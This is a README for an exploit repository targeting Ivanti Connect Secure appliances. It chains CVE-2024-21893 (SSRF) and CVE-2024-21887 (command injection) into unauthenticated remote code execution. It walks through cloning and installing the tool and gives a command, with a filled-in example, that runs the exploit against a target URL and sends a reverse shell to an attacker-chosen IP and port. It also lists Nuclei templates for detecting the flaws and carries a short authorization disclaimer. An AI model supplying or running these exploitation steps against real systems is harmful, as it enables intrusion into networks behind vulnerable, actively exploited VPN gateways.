This repository contains a Python script designed to exploit the SSRF vulnerability (CVE-2024-21893) and command injection vulnerability (CVE-2024-21887) in Ivanti Connect Secure appliances. On January 31, 2024, these vulnerabilities were disclosed by Ivanti, and have been actively exploited by chaining them together to achieve unauthenticated remote code execution.
Ivanti Connect Secure and Ivanti Policy Secure were found to be susceptible to a series of vulnerabilities that could be exploited by an attacker to gain unauthorized access and execute arbitrary code. A detailed analysis by Rapid7, published on January 12, 2024, provides an in-depth look at these vulnerabilities.
Ivanti released a series of mitigations and, as of February 1, 2024, official patches to address the vulnerabilities. It is highly recommended to apply the official patches to secure the systems against these vulnerabilities.
To use the exploit script, you will need Python 3 and the following dependencies installed:
requests
pwncat
rich
- Clone the repository:
git clone https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
- Navigate to the cloned directory:
cd CVE-2024-21893-to-CVE-2024-21887
- Install the required dependencies:
pip install -r requirements.txt
Use the following command to run the exploit script:
python exploit.py -u <TARGET_URL> -rip <REVERSE_SHELL_IP> -rport <REVERSE_SHELL_PORT>
Replace <TARGET_URL>
with the base URL of the vulnerable server, <REVERSE_SHELL_IP>
with your IP address for the reverse shell, and <REVERSE_SHELL_PORT>
with the port you wish to use for the reverse shell.
python exploit.py -u https://vulnerable-server.com -rip 192.168.1.10 -rport 1337
This repository also includes Nuclei templates to detect the SSRF (CVE-2024-21893) and RCE (CVE-2024-21887) vulnerabilities.
To use the Nuclei templates, ensure you have Nuclei installed and up-to-date.
- Detect RCE vulnerability with the
CVE-2024-21893-CVE-2024-21887.yaml
template:
nuclei -l file.txt -t ./CVE-2024-21893-CVE-2024-21887.yaml
- Detect SSRF vulnerability with the
CVE-2024-21893.yaml
template:
nuclei -l file.txt -t ./CVE-2024-21893.yaml
This tool is intended for security research and should only be used with explicit authorization from the target organization. Unauthorized use of this tool and its associated techniques for malicious purposes is illegal and unethical.
Remember to use these tools responsibly and ethically, and always have permission before testing someone else's systems. 🛡️